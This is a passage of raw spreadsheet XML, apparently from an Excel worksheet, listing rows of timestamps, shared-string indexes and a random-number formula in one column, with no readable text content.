    <row r="28227" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28227" s="1">
        <v>42857.553113425929</v>
      </c>
      <c r="C28227" t="s">
        <v>10</v>
      </c>
      <c r="D28227" t="s">
        <v>222</v>
      </c>
      <c r="E28227" s="2" t="s">
        <v>25710</v>
      </c>
      <c r="F28227">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28228" s="1">
        <v>42857.506284722222</v>
      </c>
      <c r="C28228" t="s">
        <v>10</v>
      </c>
      <c r="D28228" t="s">
        <v>667</v>
      </c>
      <c r="E28228" t="s">
        <v>25711</v>
      </c>
      <c r="F28228">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28229" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28229" s="1">
        <v>42857.491886574076</v>
      </c>
      <c r="C28229" t="s">
        <v>10</v>
      </c>
      <c r="D28229" t="s">
        <v>6</v>
      </c>
      <c r="E28229" s="2" t="s">
        <v>25712</v>
      </c>
      <c r="F28229">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28230" s="1">
        <v>42857.474212962959</v>
      </c>
      <c r="C28230" t="s">
        <v>48</v>
      </c>
      <c r="E28230" t="s">
        <v>25713</v>
      </c>
      <c r="F28230">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28231" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28231" s="1">
        <v>42857.45453703704</v>
      </c>
      <c r="C28231" t="s">
        <v>10</v>
      </c>
      <c r="D28231" t="s">
        <v>89</v>
      </c>
      <c r="E28231" s="2" t="s">
        <v>25714</v>
      </c>
      <c r="F28231">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28232" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28232" s="1">
        <v>42857.446180555555</v>
      </c>
      <c r="C28232" t="s">
        <v>41</v>
      </c>
      <c r="E28232" t="s">
        <v>25715</v>
      </c>
      <c r="F28232">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28233" s="1">
        <v>42857.445960648147</v>
      </c>
      <c r="C28233" t="s">
        <v>10</v>
      </c>
      <c r="D28233" t="s">
        <v>52</v>
      </c>
      <c r="E28233" t="s">
        <v>25716</v>
      </c>
      <c r="F28233">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28234" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28234" s="1">
        <v>42857.431157407409</v>
      </c>
      <c r="C28234" t="s">
        <v>124</v>
      </c>
      <c r="E28234" t="s">
        <v>25717</v>
      </c>
      <c r="F28234">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28235" s="1">
        <v>42857.387361111112</v>
      </c>
      <c r="C28235" t="s">
        <v>10</v>
      </c>
      <c r="D28235" t="s">
        <v>14</v>
      </c>
      <c r="E28235" t="s">
        <v>25718</v>
      </c>
      <c r="F28235">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28236" s="1">
        <v>42857.38385416667</v>
      </c>
      <c r="C28236" t="s">
        <v>10</v>
      </c>
      <c r="D28236" t="s">
        <v>80</v>
      </c>
      <c r="E28236" t="s">
        <v>25719</v>
      </c>
      <c r="F28236">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28237" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28237" s="1">
        <v>42857.378333333334</v>
      </c>
      <c r="C28237" t="s">
        <v>10</v>
      </c>
      <c r="D28237" t="s">
        <v>330</v>
      </c>
      <c r="E28237" t="s">
        <v>25720</v>
      </c>
      <c r="F28237">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28238" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28238" s="1">
        <v>42857.373159722221</v>
      </c>
      <c r="C28238" t="s">
        <v>140</v>
      </c>
      <c r="D28238" t="s">
        <v>141</v>
      </c>
      <c r="E28238" s="2" t="s">
        <v>25721</v>
      </c>
      <c r="F28238">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28239" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28239" s="1">
        <v>42857.365034722221</v>
      </c>
      <c r="C28239" t="s">
        <v>124</v>
      </c>
      <c r="E28239" s="2" t="s">
        <v>25722</v>
      </c>
      <c r="F28239">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28240" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28240" s="1">
        <v>42857.360138888886</v>
      </c>
      <c r="C28240" t="s">
        <v>10</v>
      </c>
      <c r="D28240" t="s">
        <v>163</v>
      </c>
      <c r="E28240" t="s">
        <v>25723</v>
      </c>
      <c r="F28240">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28241" s="1">
        <v>42857.348495370374</v>
      </c>
      <c r="C28241" t="s">
        <v>10</v>
      </c>
      <c r="D28241" t="s">
        <v>33</v>
      </c>
      <c r="E28241" t="s">
        <v>25724</v>
      </c>
      <c r="F28241">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28242" s="1">
        <v>42857.324224537035</v>
      </c>
      <c r="C28242" t="s">
        <v>686</v>
      </c>
      <c r="E28242" t="s">
        <v>25725</v>
      </c>
      <c r="F28242">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28243" s="1">
        <v>42857.321944444448</v>
      </c>
      <c r="C28243" t="s">
        <v>50</v>
      </c>
      <c r="E28243" t="s">
        <v>25726</v>
      </c>
      <c r="F28243">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28244" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28244" s="1">
        <v>42857.236875000002</v>
      </c>
      <c r="C28244" t="s">
        <v>71</v>
      </c>
      <c r="E28244" s="2" t="s">
        <v>25727</v>
      </c>
      <c r="F28244">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28245" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A28245" s="1">
        <v>42857.227060185185</v>
      </c>
      <c r="C28245" t="s">
        <v>430</v>
      </c>
      <c r="E28245" s="2" t="s">
        <v>25728</v>
      </c>
      <c r="F28245">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28246" s="1">
        <v>42857.211643518516</v>
      </c>
      <c r="C28246" t="s">
        <v>1050</v>
      </c>
      <c r="E28246">
        <v>1756103270</v>
      </c>
      <c r="F28246">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28247" s="1">
        <v>42857.208078703705</v>
      </c>
      <c r="C28247" t="s">
        <v>71</v>
      </c>
      <c r="E28247" t="s">
        <v>25729</v>
      </c>
      <c r="F28247">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28248" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28248" s="1">
        <v>42857.208067129628</v>
      </c>
      <c r="C28248" t="s">
        <v>71</v>
      </c>
      <c r="E28248" t="s">
        <v>25729</v>
      </c>
      <c r="F28248">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28249" s="1">
        <v>42857.188194444447</v>
      </c>
      <c r="C28249" t="s">
        <v>41</v>
      </c>
      <c r="E28249" t="s">
        <v>25730</v>
      </c>
      <c r="F28249">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28250" s="1">
        <v>42857.170081018521</v>
      </c>
      <c r="C28250" t="s">
        <v>41</v>
      </c>
      <c r="E28250" t="s">
        <v>25731</v>
      </c>
      <c r="F28250">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28251" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A28251" s="1">
        <v>42857.166759259257</v>
      </c>
      <c r="C28251" t="s">
        <v>103</v>
      </c>
      <c r="E28251" s="2" t="s">
        <v>25732</v>
      </c>
      <c r="F28251">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28252" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28252" s="1">
        <v>42857.163506944446</v>
      </c>
      <c r="C28252" t="s">
        <v>229</v>
      </c>
      <c r="E28252" t="s">
        <v>25733</v>
      </c>
      <c r="F28252">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28253" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28253" s="1">
        <v>42857.106828703705</v>
      </c>
      <c r="C28253" t="s">
        <v>48</v>
      </c>
      <c r="E28253" t="s">
        <v>25734</v>
      </c>
      <c r="F28253">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28254" s="1">
        <v>42857.078645833331</v>
      </c>
      <c r="C28254" t="s">
        <v>43</v>
      </c>
      <c r="E28254" t="s">
        <v>25735</v>
      </c>
      <c r="F28254">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28255" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A28255" s="1">
        <v>42857.009837962964</v>
      </c>
      <c r="C28255" t="s">
        <v>314</v>
      </c>
      <c r="E28255" s="2" t="s">
        <v>25736</v>
      </c>
      <c r="F28255">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28256" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28256" s="1">
        <v>42856.950729166667</v>
      </c>
      <c r="C28256" t="s">
        <v>118</v>
      </c>
      <c r="E28256" s="2" t="s">
        <v>25737</v>
      </c>
      <c r="F28256">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28257" s="1">
        <v>42856.948831018519</v>
      </c>
      <c r="C28257" t="s">
        <v>10</v>
      </c>
      <c r="D28257" t="s">
        <v>817</v>
      </c>
      <c r="E28257" t="s">
        <v>25738</v>
      </c>
      <c r="F28257">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28258" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28258" s="1">
        <v>42856.935439814813</v>
      </c>
      <c r="C28258" t="s">
        <v>10</v>
      </c>
      <c r="D28258" t="s">
        <v>6</v>
      </c>
      <c r="E28258" t="s">
        <v>25739</v>
      </c>
      <c r="F28258">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28259" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28259" s="1">
        <v>42856.901446759257</v>
      </c>
      <c r="C28259" t="s">
        <v>10</v>
      </c>
      <c r="D28259" t="s">
        <v>6</v>
      </c>
      <c r="E28259" s="2" t="s">
        <v>25740</v>
      </c>
      <c r="F28259">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28260" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28260" s="1">
        <v>42856.802164351851</v>
      </c>
      <c r="C28260" t="s">
        <v>10</v>
      </c>
      <c r="D28260" t="s">
        <v>89</v>
      </c>
      <c r="E28260" s="2" t="s">
        <v>25741</v>
      </c>
      <c r="F28260">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28261" s="1">
        <v>42856.707719907405</v>
      </c>
      <c r="C28261" t="s">
        <v>10</v>
      </c>
      <c r="D28261" t="s">
        <v>36</v>
      </c>
      <c r="E28261" t="s">
        <v>25742</v>
      </c>
      <c r="F28261">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28262" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28262" s="1">
        <v>42856.614317129628</v>
      </c>
      <c r="C28262" t="s">
        <v>10</v>
      </c>
      <c r="D28262" t="s">
        <v>33</v>
      </c>
      <c r="E28262" s="2" t="s">
        <v>25743</v>
      </c>
      <c r="F28262">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28263" s="1">
        <v>42856.555011574077</v>
      </c>
      <c r="C28263" t="s">
        <v>10</v>
      </c>
      <c r="D28263" t="s">
        <v>192</v>
      </c>
      <c r="E28263" t="s">
        <v>25744</v>
      </c>
      <c r="F28263">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28264" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A28264" s="1">
        <v>42856.479166666664</v>
      </c>
      <c r="C28264" t="s">
        <v>10</v>
      </c>
      <c r="D28264" t="s">
        <v>92</v>
      </c>
      <c r="E28264" s="2" t="s">
        <v>25745</v>
      </c>
      <c r="F28264">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28265" s="1">
        <v>42856.466412037036</v>
      </c>
      <c r="C28265" t="s">
        <v>10</v>
      </c>
      <c r="D28265" t="s">
        <v>20</v>
      </c>
      <c r="E28265" t="s">
        <v>25746</v>
      </c>
      <c r="F28265">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28266" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28266" s="1">
        <v>42856.448761574073</v>
      </c>
      <c r="C28266" t="s">
        <v>10</v>
      </c>
      <c r="D28266" t="s">
        <v>89</v>
      </c>
      <c r="E28266" t="s">
        <v>25747</v>
      </c>
      <c r="F28266">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28267" s="1">
        <v>42856.418692129628</v>
      </c>
      <c r="C28267" t="s">
        <v>10</v>
      </c>
      <c r="D28267" t="s">
        <v>163</v>
      </c>
      <c r="E28267" t="s">
        <v>25748</v>
      </c>
      <c r="F28267">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28268" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A28268" s="1">
        <v>42856.407708333332</v>
      </c>
      <c r="C28268" t="s">
        <v>10</v>
      </c>
      <c r="D28268" t="s">
        <v>20</v>
      </c>
      <c r="E28268" s="2" t="s">
        <v>25749</v>
      </c>
      <c r="F28268">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28269" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A28269" s="1">
        <v>42856.369155092594</v>
      </c>
      <c r="C28269" t="s">
        <v>8808</v>
      </c>
      <c r="D28269" t="s">
        <v>336</v>
      </c>
      <c r="E28269" s="2" t="s">
        <v>25750</v>
      </c>
      <c r="F28269">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28270" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28270" s="1">
        <v>42856.353206018517</v>
      </c>
      <c r="C28270" t="s">
        <v>10</v>
      </c>
      <c r="D28270" t="s">
        <v>14</v>
      </c>
      <c r="E28270" t="s">
        <v>25751</v>
      </c>
      <c r="F28270">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28271" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28271" s="1">
        <v>42856.346226851849</v>
      </c>
      <c r="C28271" t="s">
        <v>10</v>
      </c>
      <c r="D28271" t="s">
        <v>92</v>
      </c>
      <c r="E28271" t="s">
        <v>25752</v>
      </c>
      <c r="F28271">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28272" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28272" s="1">
        <v>42856.343460648146</v>
      </c>
      <c r="C28272" t="s">
        <v>10</v>
      </c>
      <c r="D28272" t="s">
        <v>163</v>
      </c>
      <c r="E28272" t="s">
        <v>25753</v>
      </c>
      <c r="F28272">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28273" s="1">
        <v>42856.303472222222</v>
      </c>
      <c r="C28273" t="s">
        <v>124</v>
      </c>
      <c r="E28273" t="s">
        <v>25754</v>
      </c>
      <c r="F28273">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28274" s="1">
        <v>42856.28696759259</v>
      </c>
      <c r="C28274" t="s">
        <v>41</v>
      </c>
      <c r="E28274" t="s">
        <v>25755</v>
      </c>
      <c r="F28274">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28275" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28275" s="1">
        <v>42856.134756944448</v>
      </c>
      <c r="C28275" t="s">
        <v>124</v>
      </c>
      <c r="E28275" s="2" t="s">
        <v>25756</v>
      </c>
      <c r="F28275">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28276" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28276" s="1">
        <v>42855.987037037034</v>
      </c>
      <c r="C28276" t="s">
        <v>10</v>
      </c>
      <c r="D28276" t="s">
        <v>6</v>
      </c>
      <c r="E28276" t="s">
        <v>25757</v>
      </c>
      <c r="F28276">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28277" s="1">
        <v>42855.929606481484</v>
      </c>
      <c r="C28277" t="s">
        <v>10</v>
      </c>
      <c r="D28277" t="s">
        <v>330</v>
      </c>
      <c r="E28277" t="s">
        <v>25758</v>
      </c>
      <c r="F28277">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28278" s="1">
        <v>42855.28769675926</v>
      </c>
      <c r="C28278" t="s">
        <v>477</v>
      </c>
      <c r="F28278">
        <f t="shared" ca="1" si="441"/>
        <v>4</v>
      </c>
    </row>
    <row r="28279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28279" s="1">
        <v>42855.013518518521</v>
      </c>
      <c r="C28279" t="s">
        <v>41</v>
      </c>
      <c r="E28279" t="s">
        <v>25759</v>
      </c>
      <c r="F28279">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28280" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28280" s="1">
        <v>42854.937847222223</v>
      </c>
      <c r="C28280" t="s">
        <v>60</v>
      </c>
      <c r="F28280">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28281" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28281" s="1">
        <v>42854.854189814818</v>
      </c>
      <c r="C28281" t="s">
        <v>10</v>
      </c>
      <c r="D28281" t="s">
        <v>192</v>
      </c>
      <c r="F28281">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28282" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A28282" s="1">
        <v>42854.544537037036</v>
      </c>
      <c r="C28282" t="s">
        <v>166</v>
      </c>
      <c r="E28282" s="2" t="s">
        <v>25760</v>
      </c>
      <c r="F28282">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28283" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28283" s="1">
        <v>42854.326145833336</v>
      </c>
      <c r="C28283" t="s">
        <v>48</v>
      </c>
      <c r="E28283" t="s">
        <v>25761</v>
      </c>
      <c r="F28283">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28284" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A28284" s="1">
        <v>42854.137719907405</v>
      </c>
      <c r="C28284" t="s">
        <v>173</v>
      </c>
      <c r="E28284" s="2" t="s">
        <v>25762</v>
      </c>
      <c r="F28284">
        <f t="shared" ca="1" si="441"/>
        <v>3</v>
      </c>
    </row>
    <row r="28285" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A28285" s="1">
        <v>42853.923483796294</v>
      </c>
      <c r="C28285" t="s">
        <v>10</v>
      </c>
      <c r="D28285" t="s">
        <v>52</v>
      </c>
      <c r="E28285" s="2" t="s">
        <v>25763</v>
      </c>
      <c r="F28285">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28286" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28286" s="1">
        <v>42853.663854166669</v>
      </c>
      <c r="C28286" t="s">
        <v>41</v>
      </c>
      <c r="E28286" t="s">
        <v>25764</v>
      </c>
      <c r="F28286">
        <f t="shared" ca="1" si="441"/>
        <v>2</v>
      </c>
    </row>
    <row r="28287" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28287" s="1">
        <v>42853.662291666667</v>
      </c>
      <c r="C28287" t="s">
        <v>253</v>
      </c>
      <c r="E28287" t="s">
        <v>25765</v>
      </c>
      <c r="F28287">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28288" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A28288" s="1">
        <v>42853.631805555553</v>
      </c>
      <c r="C28288" t="s">
        <v>6</v>
      </c>
      <c r="D28288" t="s">
        <v>7</v>
      </c>
      <c r="E28288" s="2" t="s">
        <v>25766</v>
      </c>
      <c r="F28288">
        <f t="shared" ca="1" si="441"/>
        <v>1</v>
      </c>
    </row>
    <row r="28289" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A28289" s="1">
        <v>42853.594085648147</v>
      </c>
      <c r="C28289" t="s">
        <v>10</v>
      </c>
      <c r="D28289" t="s">
        <v>374</v>
      </c>
      <c r="E28289" s="2" t="s">
        <v>25767</v>
      </c>
      <c r="F28289">
        <f t="shared" ca="1" si="441"/>
        <v>5</v>
      </c>
    </row>
    <row r="28290" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28290" s="1">
        <v>42853.589525462965</v>
      </c>
      <c r="C28290" t="s">
        <v>10</v>
      </c>
      <c r="D28290" t="s">
        <v>6</v>
      </c>
      <c r="E28290" t="s">
        <v>25768</v>
      </c>
      <c r="F28290">
        <f t="shared" ref="F28290:F28353" ca="1" si="442">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="28291" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28291" s="1">
        <v>42853.588055555556</v>
      </c>
      <c r="C28291" t="s">
        <v>10</v>
      </c>
      <c r="D28291" t="s">
        <v>46</v>
      </c>
      <c r="E28291" t="s">
        <v>25769</v>
      </c>
      <c r="F28291">
        <f t="shared" ca="1" si="442"/>
        <v>3</v>
      </c>
    </row>
    <row r="28292" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28292" s="1">
        <v>42853.57953703704</v>
      </c>
      <c r="C28292" t="s">
        <v>10</v>
      </c>
      <c r="D28292" t="s">
        <v>6</v>
      </c>
      <c r="E28292" t="s">
        <v>25770</v>
      </c>
      <c r="F28292">
        <f t="shared" ca="1" si="442"/>
        <v>4</v>
      </c>
    </row>
    <row r="28293" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28293" s="1">
        <v>42853.516250000001</v>
      </c>
      <c r="C28293" t="s">
        <v>5162</v>
      </c>
      <c r="E28293" t="s">
        <v>25771</v>
      </c>
      <c r="F28293">
        <f t="shared" ca="1" si="442"/>
        <v>4</v>
      </c>
    </row>
    <row r="28294" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A28294" s="1">
        <v>42853.511597222219</v>
      </c>
      <c r="C28294" t="s">
        <v>10</v>
      </c>
      <c r="D28294" t="s">
        <v>52</v>
      </c>
      <c r="E28294" s="2" t="s">
        <v>25463</v>
      </c>
      <c r="F28294">
        <f t="shared" ca="1" si="442"/>
        <v>3</v>
      </c>
    </row>
    <row r="28295" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28295" s="1">
        <v>42853.500185185185</v>
      </c>
      <c r="C28295" t="s">
        <v>10</v>
      </c>
      <c r="D28295" t="s">
        <v>80</v>
      </c>
      <c r="E28295" t="s">
        <v>25772</v>
      </c>
      <c r="F28295">
        <f t="shared" ca="1" si="442"/>
        <v>5</v>
      </c>
    </row>
    <row r="28296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28296" s="1">
        <v>42853.49077546296</v>
      </c>
      <c r="C28296" t="s">
        <v>10</v>
      </c>
      <c r="D28296" t="s">
        <v>94</v>
      </c>
      <c r="E28296" t="s">
        <v>25773</v>
      </c>
      <c r="F28296">
        <f t="shared" ca="1" si="442"/>
        <v>4</v>
      </c>
    </row>
    <row r="28297" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28297" s="1">
        <v>42853.477534722224</v>
      </c>
      <c r="C28297" t="s">
        <v>6</v>
      </c>
      <c r="D28297" t="s">
        <v>25</v>
      </c>
      <c r="E28297" t="s">
        <v>25774</v>
      </c>
      <c r="F28297">
        <f t="shared" ca="1" si="442"/>
        <v>5</v>
      </c>
    </row>
    <row r="28298" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28298" s="1">
        <v>42853.440439814818</v>
      </c>
      <c r="C28298" t="s">
        <v>16</v>
      </c>
      <c r="E28298" s="2" t="s">
        <v>25775</v>
      </c>
      <c r="F28298">
        <f t="shared" ca="1" si="442"/>
        <v>5</v>
      </c>
    </row>
    <row r="28299" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28299" s="1">
        <v>42853.432546296295</v>
      </c>
      <c r="C28299" t="s">
        <v>10</v>
      </c>
      <c r="D28299" t="s">
        <v>89</v>
      </c>
      <c r="E28299" t="s">
        <v>25776</v>
      </c>
      <c r="F28299">
        <f t="shared" ca="1" si="442"/>
        <v>1</v>
      </c>
    </row>
    <row r="28300" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28300" s="1">
        <v>42853.374837962961</v>
      </c>
      <c r="C28300" t="s">
        <v>103</v>
      </c>
      <c r="E28300" s="2" t="s">
        <v>25777</v>
      </c>
      <c r="F28300">
        <f t="shared" ca="1" si="442"/>
        <v>3</v>
      </c>
    </row>
    <row r="28301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28301" s="1">
        <v>42853.373715277776</v>
      </c>
      <c r="C28301" t="s">
        <v>6</v>
      </c>
      <c r="D28301" t="s">
        <v>25</v>
      </c>
      <c r="E28301" t="s">
        <v>25778</v>
      </c>
      <c r="F28301">
        <f t="shared" ca="1" si="442"/>
        <v>3</v>
      </c>
    </row>
    <row r="28302" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28302" s="1">
        <v>42853.369571759256</v>
      </c>
      <c r="C28302" t="s">
        <v>10</v>
      </c>
      <c r="D28302" t="s">
        <v>36</v>
      </c>
      <c r="E28302" t="s">
        <v>25779</v>
      </c>
      <c r="F28302">
        <f t="shared" ca="1" si="442"/>
        <v>4</v>
      </c>
    </row>
    <row r="28303" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A28303" s="1">
        <v>42853.36923611111</v>
      </c>
      <c r="C28303" t="s">
        <v>71</v>
      </c>
      <c r="E28303" s="2" t="s">
        <v>25780</v>
      </c>
      <c r="F28303">
        <f t="shared" ca="1" si="442"/>
        <v>1</v>
      </c>
    </row>
    <row r="28304" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28304" s="1">
        <v>42853.3512962963</v>
      </c>
      <c r="C28304" t="s">
        <v>16</v>
      </c>
      <c r="E28304" t="s">
        <v>25781</v>
      </c>
      <c r="F28304">
        <f t="shared" ca="1" si="442"/>
        <v>5</v>
      </c>
    </row>
    <row r="28305" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A28305" s="1">
        <v>42853.349409722221</v>
      </c>
      <c r="C28305" t="s">
        <v>10</v>
      </c>
      <c r="D28305" t="s">
        <v>71</v>
      </c>
      <c r="E28305" s="2" t="s">
        <v>25782</v>
      </c>
      <c r="F28305">
        <f t="shared" ca="1" si="442"/>
        <v>3</v>
      </c>
    </row>
    <row r="28306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A28306" s="1">
        <v>42853.257974537039</v>
      </c>
